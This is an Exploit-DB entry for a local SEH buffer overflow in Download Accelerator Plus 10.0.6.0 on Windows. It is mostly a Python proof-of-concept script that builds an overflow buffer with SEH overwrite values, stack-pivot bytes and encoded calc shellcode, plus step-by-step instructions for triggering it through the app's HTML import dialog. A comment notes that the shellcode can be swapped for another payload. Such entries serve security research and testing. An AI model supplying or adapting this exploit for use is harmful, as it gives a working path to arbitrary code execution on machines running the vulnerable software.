Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow

EDB-ID:

46673

CVE:

N/A

EDB Verified:

Author:

Peyman Forouzan

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2019-04-08

Vulnerable App: 
#!/usr/bin/python                                                                                         #
# Exploit Title: Download Accelerator Plus DAP 10.0.6.0 - SEH Buffer Overflow                             #
# Date: 2019-04-05                                                                                        #
# Vendor Homepage: http://www.speedbit.com/dap/                                                           #
# Software Link: http://www.speedbit.com/dap/download/downloading.asp                                     #
# Exploit Author: Peyman Forouzan                                                                         #
# Tested Version: 10.0.6.0                                                                                #
# Tested on: Win10 Enterprise 64 bit                                                                      #
# Note : In other versions of Windows, it will cause the program to Crash                                 #
# Special Thanks to my wife                                                                               #
# Steps :                                                                                                 #
#  1- Run python code : Dap.py ( Dap.txt is created )                                                     #
#  2- Open the APP --> File --> Import --> Html Web Page --> paste in contents from the Dap.txt into      #
#     Import Web Page --> Ok --> Shellcode (Calc) open                                                    #
#---------------------------------------------------------------------------------------------------------#

junk = "\x41" * 4091

nseh = "\x61\x62"
seh  = "\x57\x42"			# Overwrite Seh # 0x00420057 : {pivot 8}

prepare =  "\x44\x6e\x53\x6e\x58\x6e\x05"
prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3"
prepare += "\x41" * 107;

# calc unicode shell - can be replaced with shellcode
calc =  "PPYAIAIAIAIAQATAXAZAPA3QADAZA"
calc += "BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"
calc += "58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"
calc += "AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"
calc += "22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"
calc += "MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"
calc += "Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"
calc += "NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"
calc += "R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"
calc += "NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"
calc += "89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"
calc += "KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
calc += "QQ2LRCM0LJA";

buffer = "http://" + junk + nseh + seh + prepare + calc
print "[+] Creating %s bytes payload ..." %len(buffer)
f = open ("Dap.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()
Tags: Local Buffer Overflow
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services